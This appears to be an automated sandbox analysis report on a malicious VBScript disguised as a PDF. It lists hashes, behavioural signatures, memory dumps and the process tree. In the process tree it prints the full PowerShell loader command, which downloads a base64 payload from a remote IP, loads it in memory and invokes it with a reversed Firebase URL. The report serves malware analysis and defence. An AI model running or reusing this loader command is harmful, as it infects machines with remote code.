Analysis
-
max time kernel
45s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
28-09-2022 19:31
Static task
static1
Behavioral task
behavioral1
Sample
TV06KSFYOU_002_PDF.vbs
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
General
-
Target
TV06KSFYOU_002_PDF.vbs
-
Size
577KB
-
MD5
92be06b804449682d272f3afc76aca5f
-
SHA1
f575b8712aa0f0720b6ad981ca8bbe682badd1d8
-
SHA256
e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9
-
SHA512
09b067ad4507a7efbd075a3d8400e63627d62d4bf9e542fb527755eac71240e556ae9b4f45e408e2b4d9dfe42688c18b9dd0a4007ca23dc77d8d16449808068c
-
SSDEEP
96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHA:cKLosxvRG
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 868 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1812 wrote to memory of 868 1812 WScript.exe powershell.exe PID 1812 wrote to memory of 868 1812 WScript.exe powershell.exe PID 1812 wrote to memory of 868 1812 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TV06KSFYOU_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdbd2471442d-d42a-e044-ff2d-d8c5491d=nekot&aidem=tla?txt.hdcnysaer/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/868-55-0x0000000000000000-mapping.dmp
-
memory/868-57-0x000007FEF3710000-0x000007FEF4133000-memory.dmpFilesize
10.1MB
-
memory/868-58-0x000007FEF2BB0000-0x000007FEF370D000-memory.dmpFilesize
11.4MB
-
memory/868-59-0x00000000028E4000-0x00000000028E7000-memory.dmpFilesize
12KB
-
memory/868-60-0x00000000028EB000-0x000000000290A000-memory.dmpFilesize
124KB
-
memory/868-61-0x00000000028E4000-0x00000000028E7000-memory.dmpFilesize
12KB
-
memory/868-62-0x00000000028EB000-0x000000000290A000-memory.dmpFilesize
124KB
-
memory/1812-54-0x000007FEFBCA1000-0x000007FEFBCA3000-memory.dmpFilesize
8KB